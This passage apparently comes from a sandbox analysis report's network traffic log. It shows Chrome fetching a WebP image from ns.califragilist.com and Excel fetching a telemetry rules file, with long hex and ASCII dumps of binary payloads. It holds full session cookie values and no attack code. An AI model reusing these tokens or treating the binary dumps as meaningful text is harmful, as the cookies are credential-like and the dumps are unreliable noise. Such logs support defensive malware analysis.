                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 74 59 df a4 43 7f fa 96 d2 fc 1e a9 83 1d 98 3b ff d5 ec 64 6c 59 9a f0 03 d6 a5 4f 38 4e ec 3a 68 37 d3 07 fb 1f 84 dd 2f 8d c4 96 b3 84 dd 1e f9 3a 16 77 91 b1 ba 12 d0 75 12 2b a1 1c 4c b4 b5 ef d5 2e 35 28 73 57 9a 39 e9 98 64 58 e9 d0 b4 7b e8 16 21 56 f2 7a 79 75 96 46 6d ff f8 fd 8e 47 59 1e 51 75 fa 4f 1c f4 c0 2b 50 0d c7 38 64 77 5c 56 a5 36 ed b8 72 b8 da 1e 0e 0a 69 82 90 3b 33 be ae 6c f6 56 ae 05 a3 38 1d 8c d7 88 56 f9 80 6c 09 bd 3c 43 e9 8d ed 68 6b be 0e a3 c5 6a 53 7a fc 05 18 5f ac 03 2a 1b 77 43 cf e8 fb a2 b4 a2 f0 8e 71 6d 71 27 f8 cb 31 bb 4a bb 26 91 99 75 2b 90 dd d8 0d 1d 44 ab 0d ce 1a cd 88 75 03 8c 1b a0 f4 ce 87 95 9c ae fc 60 9d ec d2 13 50 73 5d 45 cb 99 9e 74 68 a2 ba ba 9a ef 3f 49 aa b8 3a 89 2f 67 c1 f9 04 19 d5 d1 b9
                                                                                                                                              Data Ascii: tYC;dlYO8N:h7/:wu+L.5(sW9dX{!VzyuFmGYQuO+P8dw\V6ri;3lV8Vl<ChkjSz_*wCqmq'1J&u+Du`Ps]Eth?I:/g
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 28 00 47 75 de 65 0f 38 5a 84 ae 02 51 db 09 ec 89 38 1e 98 43 cf 50 89 af 52 0d 45 89 6b 6b e5 cc 10 46 c7 86 d2 c0 50 f6 84 50 22 53 b0 b1 7d bf b9 ae 5e af 53 74 d8 04 f6 f9 68 ab b4 1b 06 c3 76 71 2d 6f 23 97 f3 73 1a 6a 3a 34 ed 64 31 3e bc cd 97 3c bf cd c3 35 b7 ee 21 9e 0e cb 60 1c 13 f6 47 8d d4 74 4e e0 42 d6 40 a4 4e af 30 f4 de b7 ac 74 6a e8 f4 a2 03 93 cd 92 0a ec 6d 09 b2 b7 8e a9 35 a1 a0 c3 75 bf b5 81 16 c7 f1 b1 d4 5d 3d 72 a4 be db b5 16 f7 dc 35 7e 55 7e c7 67 09 3c 8b e3 3b f8 a6 de 44 25 d1 d6 bb c3 38 29 fe eb ff 1a c7 ce 96 52 00 cb 29 c3 5e 1f 11 ef 1e ec a4 9e 8e c8 24 65 3f 8e 83 66 fe e9 b9 99 ad f8 c1 8b f1 dc 15 ca 57 a5 52 ef e0 00 0a ed 07 98 dd 12 ab 50 c7 63 d5 2c 27 c3 71 aa 86 f6 75 24 50 bf 8e c5 4d 96 ef cc 78 d4 be
                                                                                                                                              Data Ascii: (Gue8ZQ8CPREkkFPP"S}^Sthvq-o#sj:4d1><5!`GtNB@N0tjm5u]=r5~U~g<;D%8)R)^$e?fWRPc,'qu$PMx
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 1c bd 63 8d 49 38 5e b6 f0 af f8 b9 89 d6 f9 39 7d db ff ff c9 c1 ff f9 31 af ff f2 51 90 17 19 60 64 27 48 af 92 6b 57 59 68 96 10 7c 31 1e 74 e0 c0 e7 05 7b a2 b6 7e 70 27 82 e1 95 48 90 95 36 78 69 35 18 77 d4 8a 58 b7 d6 1e 8d 3d 07 d3 c4 f8 e3 ec e1 75 56 e1 b2 fd a3 56 b3 e0 ec ce 05 db 3e 96 80 d4 53 cf b1 f6 cf 43 88 fa ec 92 d2 4d 3d 83 cb de 8b 41 88 2e ec 4a 6c be 90 50 59 31 be 1b a5 22 95 36 76 11 da e5 9f d3 0b a5 ba 6d bd 03 6e 27 7d 7f bc 3e 2e a2 7d 38 75 67 b4 59 c4 69 e7 c4 e7 41 c2 08 5b c8 41 ba b8 a2 1e 09 93 8e 9e fd ea 07 be 14 ff 13 47 e8 71 18 0a 03 d3 4b 96 0e f1 fe 47 29 00 4d 09 85 0d b5 cb 4f f7 95 f4 37 24 fd a4 f6 ce cd 00 77 59 74 0f 9f 27 84 10 0b e1 a0 fd 2f 7b 8e 9f de 91 ff 6b c9 0d 80 ae 94 98 95 99 39 41 2e ab 36 5e
                                                                                                                                              Data Ascii: cI8^9}1Q`d'HkWYh|1t{~p'H6xi5wX=uVV>SCM=A.JlPY1"6vmn'}>.}8ugYiA[AGqKG)MO7$wYt'/{k9A.6^
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 03 c3 2b 4e 89 20 3f 30 e1 97 38 b7 df b7 fc f8 6a 1e d0 6f 33 7d eb dc 1d 0c 0f 5b 85 66 dd 7b 62 68 03 df 43 73 08 8b 62 ae 56 56 80 af ff e4 eb 17 e9 85 6a 29 24 00 82 b7 11 17 09 0a ad 78 a4 63 80 f4 4f 58 cc 42 bd f1 85 3e 17 9d ba 4b a6 e2 ad 8e 77 1a c0 59 af 8b ae cb 6e 34 54 5d a6 1b 59 90 bf 71 df 7f aa 30 6a 46 6a b8 00 dc e4 d5 03 4e a0 92 26 32 58 b8 d2 0e b1 2c 8a 0a 02 41 e3 14 15 61 f0 79 07 70 c5 a5 c1 69 98 91 36 05 a7 39 88 36 2b 41 4e a0 e1 a8 8d 32 ae dd bf bd e4 40 d7 68 4c 5b 2d 09 00 df d1 8a af ad ad f8 87 e8 6a d3 4d 3a c1 c5 df af b1 1a cb 6f f2 75 41 d8 77 98 66 c3 3f 01 d9 24 9e 2b 91 2c f1 58 5f f3 05 80 6f 0e e0 e6 df 4d 56 68 75 04 7c 61 9b 75 f8 94 a7 45 ec 60 97 2d ea 0f ad 5d 53 02 7c 34 13 79 11 49 eb ed 73 3f cd 1b 52
                                                                                                                                              Data Ascii: +N ?08jo3}[f{bhCsbVVj)$xcOXB>KwYn4T]Yq0jFjN&2X,Aaypi696+AN2@hL[-jM:ouAwf?$+,X_oMVhu|auE`-]S|4yIs?R
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: a5 88 e3 8f 6d 17 d7 fc 27 b9 c9 c7 3f bf e6 8a 2b 52 63 c7 f3 be 1a 36 2f 61 1c a5 70 03 c0 f8 e3 73 c8 0b 73 4c ed 9b ef da 31 4a ad f7 62 90 0d f7 d9 36 39 cc f9 64 80 e6 fa ef 79 d1 7a 95 ab a4 48 59 7d b5 9d 91 de ef 0c f2 4b 81 57 4f a7 7e 4e ee bd bb 1e bb d8 27 da 1b a2 15 6a 4d 2f 12 f6 35 d2 d1 4e 0b 5d fc e2 ec 02 21 c7 77 dd 0f e0 3f 65 e9 64 ef d4 d5 e0 b9 92 fd e8 0a 11 88 73 76 5b 4f 67 e6 fb e2 ef 9b 47 05 04 1e a4 30 91 04 9f 08 c2 7b 5e 0a 24 ef b0 d4 0a 27 35 4b 56 14 f8 e7 a3 94 90 36 91 b8 ef 1b 45 49 99 17 bf ce 20 3e 60 3c 7c 60 21 df 65 7b 3f 6b b9 01 f8 7f dc 63 80 8f 21 d2 23 ae dd 7f 9d 62 35 30 f3 7d dc 46 ee 5c 25 2d 0a f3 1f d2 eb 5e b7 d1 51 64 c3 98 0a 99 8a a0 2c 28 09 7c 30 ba bf 48 8f e9 26 58 55 ff 7c 10 56 b3 a3 5b 86
                                                                                                                                              Data Ascii: m'?+Rc6/apssL1Jb69dyzHY}KWO~N'jM/5N]!w?edsv[OgG0{^$'5KV6EI >`<|`!e{?kc!#b50}F\%-^Qd,(|0H&XU|V[
                                                                                                                                              2024-11-06 15:56:07 UTC1107INData Raw: f3 84 bc 75 7f c2 35 33 18 84 28 60 e8 68 a5 b5 da f0 dc 63 f3 4a 11 e5 f6 ff d0 f4 5a a2 8e 8c 2e aa 69 b7 d4 0a 7c 5b 26 34 eb e6 71 e7 31 4b 35 81 80 e9 67 9a bb d5 1c 7a 47 5b 22 f2 29 7e 24 06 e6 ac 02 34 5d 3e 6b f3 be 70 35 a8 90 8d c4 9a fc a1 46 f7 e2 46 50 0f 00 fc 8b 54 f1 9d da e0 96 2d 38 99 a3 c1 f0 3c 39 b6 1d 07 09 f0 a6 ce a5 c8 f8 ad b9 23 6c 29 92 be bf 77 2b 9b 40 67 08 e7 23 3a e0 4d 2b d7 4c a6 2f 8d ef 42 72 f0 7c 26 12 b0 90 a3 81 6a 7e 60 fc 6d f4 65 8f 18 b7 9a fe 0d d5 34 75 21 75 53 03 90 17 f5 fa 85 80 a4 2f 51 ff e1 21 33 80 11 99 9f ed 80 a6 c3 98 5f 3c 1f ff e0 ed 55 f3 00 c6 7a ce 21 00 33 2e 74 d2 91 1d 5d 3f a5 53 32 ad 6c c5 7c e0 e3 07 04 10 fd 7e b0 7a 35 b7 83 14 99 23 72 ab 96 98 26 c0 bd 3a 41 8f e9 ee b7 ae a1 32
                                                                                                                                              Data Ascii: u53(`hcJZ.i|[&4q1K5gzG[")~$4]>kp5FFPT-8<9#l)w+@g#:M+L/Br|&j~`me4u!uS/Q!3_<Uz!3.t]?S2l|~z5#r&:A2


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              96192.168.2.1849889188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:07 UTC1133OUTGET /uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlRjNGdzdE1qREM0Y01uZmVRWnFBT2c9PSIsInZhbHVlIjoiSkd0UXJWbU9EYWxHZWZhN2lkNTY3YVJWcFJuaEI3UDhiNForZ1RvZml2eUlSTDgvakVWcEt2cHpITndCaTQ0QThqak9CS08wQWFXcjNJMURId2dCc2ZsdENpVlhyR2lMWXN6Q0U3a24xQWNYaU0xcE5KVCtiMkpHM2wyT1BYWVkiLCJtYWMiOiI2M2Q3ZjFkNGExMDQwNDcyOTcyNDgxZDZhNzU3M2QwNDI2ZTk3ZGFjMzk2NjFhMDE2ZDJiMTdkMDZiMzZhNTEwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVLZzJQQ2lmcFZFbFF3SEdWbjRkU0E9PSIsInZhbHVlIjoiZ09nZDVxQnZqYkoyWndJOHVPeEgzR0RhNVB5bmNBOFo1WXpxTFVXYkRlbzdRS2R0SmFZZHpJV1BRRG9FbnNVczM2anliZCtCOHUvQmVDNmlhSEhLelpDSzhScGdnRUd2TXljVm1tWUJaeUdMZEg3M3YwaXNzU0NEL1g3akRVS0EiLCJtYWMiOiI4Yjk2N2YwYjJhZTY5OTk0ODJmZjNkYWI2NDMwZDk1YjIyNDJlMDMwMTY3OWFkMTNmODQ4ZmM3ZWQxOTRmNDQ1IiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:07 UTC1044INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:07 GMT
                                                                                                                                              Content-Type: image/webp
                                                                                                                                              Content-Length: 17842
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8dsGPLHhGEj%2BHo3nGkJOgzkGIz%2FJhMr8hQT5IrqGZUdilLt5kn88UaKy6YsPQAHnbrl7Exi5j7XN%2BdThxVbMRBW3NEfPUjkFP4FOW6k%2BPd%2FiZG1RjqJbi2TMhMd9%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3463&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2054&delivery_rate=834341&cwnd=251&unsent_bytes=0&cid=18f3823bc63da8e3&ts=141&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de64592592d6b89-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1333&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1711&delivery_rate=1469304&cwnd=251&unsent_bytes=0&cid=e8890eab6fdb0eb9&ts=416&x=0"
                                                                                                                                              2024-11-06 15:56:07 UTC325INData Raw: 52 49 46 46 aa 45 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 30 00 00 00 8d 09 00 82 03 00 49 43 43 50 c8 01 00 00 00 00 01 c8 00 00 00 00 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e0 00 01 00 01 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 24 72 58 59 5a 00 00 01 14 00 00 00 14 67 58 59 5a 00 00 01 28 00 00 00 14 62 58 59 5a 00 00 01 3c 00 00 00 14 77 74 70 74 00 00 01 50 00 00 00 14 72 54 52 43 00 00 01 64 00 00 00 28 67 54 52 43 00 00 01 64 00 00 00 28 62
                                                                                                                                              Data Ascii: RIFFEWEBPVP8X0ICCP0mntrRGB XYZ acsp-desc$rXYZgXYZ(bXYZ<wtptPrTRCd(gTRCd(b
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 58 59 5a 20 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 70 61 72 61 00 00 00 00 00 04 00 00 00 02 66 66 00 00 f2 a7 00 00 0d 59 00 00 13 d0 00 00 0a 5b 00 00 00 00 00 00 00 00 6d 6c 75 63 00 00 00 00 00 00 00 01 00 00 00 0c 65 6e 55 53 00 00 00 20 00 00 00 1c 00 47 00 6f 00 6f 00 67 00 6c 00 65 00 20 00 49 00 6e 00 63 00 2e 00 20 00 32 00 30 00 31 00 36 41 4c 50 48 e9 2c 00 00 0d 24 c5 6d db 38 d2 fe 6b a7 5c bf 6f 44 4c 80 cf 8b 20 0b c4 54 55 8a 05 ce ab 8e 33 27 f4 7b ed 67 db 1f 36 ad f6 32 81 cd 04 36 13 44 4c 60 65 82 98 09 22 26 40 9d a0 62 82 23 26 40 99 a0 ca 04 c8 13 54 99 a0 f2 04 95 27 e0 8f b6
                                                                                                                                              Data Ascii: 8XYZ bXYZ $XYZ -paraffY[mlucenUS Google Inc. 2016ALPH,$m8k\oDL TU3'{g626DL`e"&@b#&@T'
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: e2 01 2b b8 cd ad 2d 99 40 51 1d 4f e1 84 cf b6 1c f4 87 17 a4 df f6 bc c3 c7 d5 a8 90 8b e8 30 df 6c 45 03 fd c7 c2 7d 3e 1a ff 41 ea ac ef 2b 7c 68 ab 47 99 89 e8 30 e3 f5 9a c6 fe 18 cb d5 a3 ac 61 ec 12 30 9f 8f 04 d2 ee 7b 8e 8f ef ee ca 66 c1 04 d6 72 85 29 97 28 0c 94 a2 1b f0 e9 b6 23 3b 22 e1 ba ef 39 16 f4 18 00 b4 4d 16 d0 32 07 a6 91 e7 f0 0b ab d6 55 a4 2e 56 bb 29 8d bb ea c8 d4 a7 1b 0e 72 95 10 ff 86 65 7c 0a de 47 1f f1 db 30 a2 66 35 63 ac 49 ab d9 9a f4 5a 83 c4 4f 3e b8 e8 f1 7b 3f a1 66 35 6b db 2e 1f be aa d1 5c fb 52 49 14 57 3e 56 44 4f f8 74 cb c8 06 7c 2c 4f ce 39 bc 3b fa e8 bd bf e2 fd 2e 21 28 95 5c 6d 90 f2 c9 3a 87 77 47 1f 7d 08 03 63 9c 6d b2 58 d9 94 ba 54 a2 3c de 68 9a d3 b7 cf 37 2d 99 f9 48 1c ad 03 61 70 76 e8 55 93
                                                                                                                                              Data Ascii: +-@QO0lE}>A+|hG0a0{fr)(#;"9M2U.V)re|G0f5cIZO>{?f5k.\RIW>VDOt|,O9;.!(\m:wG}cmXT<h7-HapvU
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: e1 6c 89 d7 ba 43 01 99 e4 c8 74 23 c4 d1 b8 42 70 85 2c 9b 5e 3e e9 6c 5a 29 90 69 23 c4 c9 d8 34 2e af 2d 4a 36 60 39 fa d5 07 18 41 d3 dc b8 cc 18 28 35 96 6b ab 38 32 ae a4 18 54 28 40 af 51 40 21 2a e4 bc 17 57 ca 15 80 2b e4 5b c7 4c b8 6a 90 f3 4e dc 2a 73 89 e2 54 8e 88 81 d8 2c 88 15 48 2a 08 93 99 24 31 8b a5 55 1d 72 df ab 9b ec 6a 83 02 0a 85 ec 3b 75 a5 5c 66 b5 6e 30 b7 5c 21 fb 46 6d 95 b9 b4 8d 3f 89 04 95 9d 9b 76 d5 22 0c 7b 9a de c5 ac ea 1d c5 01 0b b5 96 7b 2c 40 a6 91 3f 37 28 62 a7 ae 44 c8 a9 d7 98 5b ae 50 c4 46 dd 28 77 69 ea 89 1c 88 39 d1 11 73 db 50 f8 f5 07 18 41 53 6d 6d 56 02 94 66 a1 08 85 25 c8 34 b2 6f 0d 8a d9 99 83 8e b9 d4 06 73 5b eb 06 a5 ec d4 28 e3 45 a9 07 b1 25 6a 2b 22 3b 3b a4 71 05 c2 dd 34 24 90 3a 2b 49 31
                                                                                                                                              Data Ascii: lCt#Bp,^>lZ)i#4.-J6`9A(5k82T(@Q@!*W+[LjN*sT,H*$1Urj;u\fn0\!Fm?v"{{,@?7(bD[PF(wi9sPASmmVf%4os[(E%j+";;q4$:+I1
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: f8 16 79 3a 0b fb 87 e8 24 93 62 ff 10 1d 0c 51 5d b4 42 9e 76 48 b5 26 fa 33 d7 c8 ba 52 37 22 ce 0e 50 f5 6a 90 71 b5 40 4b 9a 6e 0c 49 49 12 bb 20 d8 2e 9d 49 3f 83 d8 19 77 27 9b 22 1d bd f3 f1 77 ac 66 8c 6d ce a2 91 ea a0 5e 41 69 ed a0 f6 a9 6c b6 fa 5c 3d c8 ef 41 6e cc a8 fa 2a 0d 8d 54 07 f5 03 94 5e 1f a5 ac 12 a9 be a8 b7 f8 78 96 9a 11 45 9f 54 cd 88 42 20 5a be 8f df 90 2c 23 f2 bf 13 7b e4 be 7b 14 3e 95 ba 20 00 f6 8f 46 ad 15 84 b1 23 81 d4 29 d5 3b 8a e9 db 82 d0 48 75 d2 cf 48 30 1a bd 55 4d 69 06 63 f1 56 1f bd f7 63 2f ba 77 49 24 7a 92 af a0 0e 6a 30 5d 1a 50 3a 9e 89 93 7d 41 8a 41 b9 7b 59 25 c0 ab 44 46 f9 13 d4 51 db c7 5d 1a 78 38 86 37 5c 78 47 81 84 2b a2 f8 1b d1 21 ff e6 60 4c 22 ac 2c a8 e4 bd 70 eb 04 30 82 46 98 94 04 28
                                                                                                                                              Data Ascii: y:$bQ]BvH&3R7"Pjq@KnII .I?w'"wfm^Ail\=An*T^xETB Z,#{{> F#);HuH0UMicVc/wI$zj0]P:}AA{Y%DFQ]x87\xG+!`L",p0F(
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 00 42 00 10 c2 ef a2 47 cd 7e 69 5b 70 74 99 54 5f d4 ba 80 bb 69 48 ba 31 d0 d4 9c 44 2f 87 b6 22 1b 5e 67 6b 7a 49 8b 81 dc 20 ef 30 6d a8 aa eb f0 9e 58 93 61 bf 95 31 bb ba 21 b3 c8 dc f6 54 60 fe 52 84 c6 9c 24 59 9b d8 f1 01 d4 41 5e 99 2a 89 fd 10 ce 16 4e 1e 3e 22 04 9c 39 fa 5f 42 80 c3 50 33 ce 58 93 1c 1e 8e 61 55 00 5a 92 40 18 9a 1e 94 a7 d7 e5 c0 41 6e 30 db 16 69 f3 d2 c1 08 2a 30 ff 1e cf e8 b0 bf 97 3e 37 8e d9 e3 ee 62 04 3c dc f3 58 90 49 bc 22 41 2b 8f 9b 14 20 f5 d9 8c 45 ba d1 3b ef af 78 cf ab b4 a0 d4 67 14 d1 2e 0c f5 0e ce 17 86 73 cb c2 88 9c 24 89 c6 72 9a be 7d 14 4e c8 dd f6 c9 61 e8 e8 b0 31 47 1d f3 62 64 d3 4b 76 db 8a 8a f9 0b 12 36 c7 de d3 24 3d ee 91 66 e4 5f f6 29 08 73 b6 f4 83 b3 6e 2b 76 49 ed 87 f0 19 a5 59 18 8f
                                                                                                                                              Data Ascii: BG~i[ptT_iH1D/"^gkzI 0mXa1!T`R$YA^*N>"9_BP3XaUZ@An0i*0>7b<XI"A+ E;xg.s$r}Na1GbdKv6$=f_)sn+vIY
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 5f 39 40 5c 3d e7 03 ec bf f0 f8 ef 13 dc b8 a7 02 77 67 88 35 d5 09 39 c7 9a a8 ec e1 aa a1 6a c3 ea c0 b6 a1 80 30 6f aa 39 89 c1 bf f5 e6 c9 6c f2 c1 e6 49 84 7f 9f a0 54 0e 9e 51 c5 ac 1c 27 aa 63 c9 60 fb b5 05 18 41 b2 3f c6 b7 f4 f8 94 00 2f ef 1e f2 c1 e6 20 fc bf 4f 61 d8 67 40 1f b2 22 df 9c 8a e6 19 d5 0a 21 11 84 79 8b 24 39 62 69 d7 f1 b2 d0 66 85 a8 4e 7a 93 0d aa 83 88 cb 25 5e 6a 60 7b aa 66 8a ef 73 bc 64 9e 11 15 9e ae 8e ab 03 e1 b4 4b 85 83 d4 2c 2e e6 2f 0b 4d 5e 80 93 77 b2 ca 05 cd a1 8f 39 70 37 0b fe 72 b3 ad 88 c0 fc fb ca 1e eb 25 c3 fc ea 00 8c 20 d9 5c f9 3f 09 92 f1 fb e2 ba b0 8e 64 80 32 8f fb 5c b0 f9 22 72 f8 b7 d3 f6 54 dc 9d 61 e8 0a 36 f3 63 43 b4 46 68 6f 1b 0a 48 fd 87 7a 47 62 70 b9 f6 8c aa 0d 73 10 12 40 94 83 da
                                                                                                                                              Data Ascii: _9@\=wg59j0o9lITQ'c`A?/ Oag@"!y$9bifNz%^j`{fsdK,./M^w9p7r% \?d2\"rTa6cCFhoHzGbps@
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: a0 b7 e5 40 68 13 83 ed c9 f0 70 72 99 f0 86 4e 2f 06 b4 61 26 84 f7 e5 30 20 1f 5f cf e7 6e 1a 9a ea 49 a4 a7 40 7d c4 fb eb 58 0c 09 fa 23 56 0e 8d 48 4e 63 e1 1a 41 87 cd bd 5c 42 5a d2 55 87 3e 8f 5a d1 1d 51 50 c7 93 db 56 64 30 32 66 51 6b 90 8f 3f 97 03 f3 33 d1 7e 3b e8 52 48 d0 5b 10 6a 49 83 ee 56 a7 c6 1b 32 7b 06 e3 4c 21 f8 2e 01 bb 76 a0 65 6a d3 cb d2 d1 32 01 ec b7 22 a3 36 cc 45 98 36 64 d8 dc cb 2c 2c e8 f5 59 b8 cb 24 fd e8 7a ba e6 51 64 a1 41 af b0 1c b9 9b 09 e0 9f 5b 11 8a c0 f6 09 38 0a 23 88 a0 ac 4f ab d6 c8 a0 fe e7 5a c4 12 30 85 f5 87 30 76 89 59 2c dd 30 76 09 60 7f 65 b2 91 0f 37 73 01 2d e9 f0 30 99 0c 14 e8 c7 1f 67 51 5c 84 59 80 11 74 d8 6d 65 06 02 f4 d3 cb 8c 38 4e d5 db d9 40 f7 64 74 01 5a 03 fa f1 3b 45 3c ee 89 aa
                                                                                                                                              Data Ascii: @hprN/a&0 _nI@}X#VHNcA\BZU>ZQPVd02fQk?3~;RH[jIV2{L!.vej2"6E6d,,Y$zQdA[8#OZ00vY,0v`e7s-0gQ\Ytme8N@dtZ;E<
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: b0 54 00 6c 7a d6 b2 5f 66 78 c3 5a de b6 a7 18 02 00 1f 59 0d 80 a3 43 86 02 89 fa e3 d7 34 80 8a 73 c6 c7 00 38 56 a3 de 20 e9 d3 b7 d4 7e ed 78 cb d8 18 a2 07 e0 6a 06 a0 6d eb 0d 72 3c fe 58 51 b0 b7 4d 12 e3 8f 05 05 73 b5 4f 6d b1 da 69 9f 56 e6 c3 4b 7a bf 56 8c b7 6d db fe 21 69 43 00 7f fc 9a 56 e6 a7 e7 39 b2 7d 2a f3 bf a9 db 16 00 ab 91 ef 23 92 55 db 2e 91 df 36 2d c0 91 be 40 b6 4d 5b 33 00 1c 39 8f 5f b1 a6 68 44 12 1a 8b 5a de 6f 3e 06 90 f7 9b d9 18 1f 30 af c3 2b 05 d4 b6 9b 8d e9 01 73 1c ae 9a 85 54 c0 e1 25 1d 88 a7 2a a1 4c ef 31 eb 3d 56 15 b5 4c c2 2c ab 28 0e d5 c7 20 ca a7 6a 26 a6 3d 66 56 82 b6 7f 6a e6 42 60 9e 6d ff 41 1a 1f 90 70 50 a6 70 87 d7 59 bb c7 ba 62 3c ee 13 38 62 61 07 e1 3e 06 f0 ca ce 84 c4 cc 1e 40 1c c5 a1 9a
                                                                                                                                              Data Ascii: Tlz_fxZYC4s8V ~xjmr<XQMsOmiVKzVm!iCV9}*#U.6-@M[39_hDZo>0+sT%*L1=VL,( j&=fVjB`mApPpYb<8ba>@
                                                                                                                                              2024-11-06 15:56:07 UTC1369INData Raw: 28 a0 b3 f6 aa e7 bc 4a 6c b0 ee 27 fe cb 6f 02 49 c6 ce 9d 25 df 60 a8 88 4d a0 c9 de 5a 77 cd 39 6b 12 18 bd 73 3f 90 a4 73 44 c5 0e d6 0e 9c f3 2e 85 d1 79 f7 03 65 f4 ce b9 1b c6 58 97 c0 e0 9c 43 91 83 75 47 ce 39 ab 12 18 bd 73 3f 50 c6 60 88 0a 68 cd d0 f7 3b 9a 93 73 0e 65 8f ce f9 81 b3 96 75 69 4c de 3b ff 8a 99 b4 d6 de f4 9c 55 34 a3 77 f6 15 c5 0c d6 b9 1b ce d8 26 8d d1 7b e7 b0 f6 ec 9d f3 13 e3 6d db 9d eb 14 7d f0 1e 4b d8 39 37 b0 96 b1 ba 3b d7 18 7c f0 1e 85 f5 de fb a1 65 ac 6d 59 75 9e 53 74 c1 7b 14 dd 39 e7 af 19 6b 5b 56 9d 69 0c 3e 3a 8f 45 1d ad 3d 72 ce da cd 19 26 1f bc 77 98 49 e7 83 1f da 96 d5 1c ac 3a d7 00 17 7d f8 89 99 f5 d6 f9 1b d6 f2 7a 73 8e 21 7a 17 5e 51 5c ef bc 3f f1 b6 e5 e8 ce 77 8a 2e 7a 8f d5 e8 e8 5d 08 03
                                                                                                                                              Data Ascii: (Jl'oI%`MZw9ks?sD.yeXCuG9s?P`h;seuiL;U4w&{m}K97;|emYuSt{9k[Vi>:E=r&wI:}zs!z^Q\?w.z]


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              97192.168.2.184989113.107.246.454436516C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:11 UTC207OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                              2024-11-06 15:56:11 UTC538INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:11 GMT
                                                                                                                                              Content-Type: text/xml
                                                                                                                                              Content-Length: 2128
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                              ETag: "0x8DC582BA41F3C62"
                                                                                                                                              x-ms-request-id: 8720efe9-c01e-0082-3dd2-2caf72000000
                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                              x-azure-ref: 20241106T155611Z-16547b76f7f4k79zhC1DFWu9y000000006u000000000ntde
                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                              Accept-Ranges: bytes
